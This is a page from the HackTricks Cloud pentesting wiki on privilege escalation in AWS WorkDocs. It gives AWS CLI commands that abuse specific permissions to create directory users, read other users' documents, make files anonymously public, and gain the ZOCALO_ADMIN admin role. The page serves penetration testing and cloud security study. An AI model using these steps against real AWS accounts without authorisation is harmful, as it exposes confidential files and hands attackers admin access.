hacktricks-cloud/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md

# AWS - WorkDocs Privesc

## WorkDocs

For more info about WorkDocs check:

{% content-ref url="../aws-services/aws-directory-services-workdocs-enum.md" %}
[aws-directory-services-workdocs-enum.md](../aws-services/aws-directory-services-workdocs-enum.md)
{% endcontent-ref %}

### `workdocs:CreateUser`

Create a user inside the Directory indicated, then you will have access to both WorkDocs and AD:

```bash
# Create user (created inside the AD)
aws workdocs create-user --username testingasd --given-name testingasd --surname testingasd --password <password> --email-address name@directory.domain --organization-id <directory-id>
```

### `workdocs:GetDocument`, `(workdocs:`DescribeActivities`)`

The files might contain sensitive information, read them:

```bash
# Get what was created in the directory
aws workdocs describe-activities --organization-id <directory-id>

# Get what each user has created
aws workdocs describe-activities --user-id "S-1-5-21-377..."

# Get file (a url to access with the content will be retreived)
aws workdocs get-document --document-id <doc-id>
```

### `workdocs:AddResourcePermissions`

If you don't have access to read something, you can just grant it

```bash
# Add permission so anyway can see the file
aws workdocs add-resource-permissions --resource-id <id> --principals Id=anonymous,Type=ANONYMOUS,Role=VIEWER
## This will give an id, the file will be acesible in: https://<name>.awsapps.com/workdocs/index.html#/share/document/<id>
```

### `workdocs:AddUserToGroup`

You can make a user admin by setting it in the group ZOCALO\_ADMIN.\
For that follow the instructions from [https://docs.aws.amazon.com/workdocs/latest/adminguide/manage\_set\_admin.html](https://docs.aws.amazon.com/workdocs/latest/adminguide/manage\_set\_admin.html)

Login with that user in workdoc and access the admin panel in `/workdocs/index.html#/admin`

I didn't find any way to do this from the cli.